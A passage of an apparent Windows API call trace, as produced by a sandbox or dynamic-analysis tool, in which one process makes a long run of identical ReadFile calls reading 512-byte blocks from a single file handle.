	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.322] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.324] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.325] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
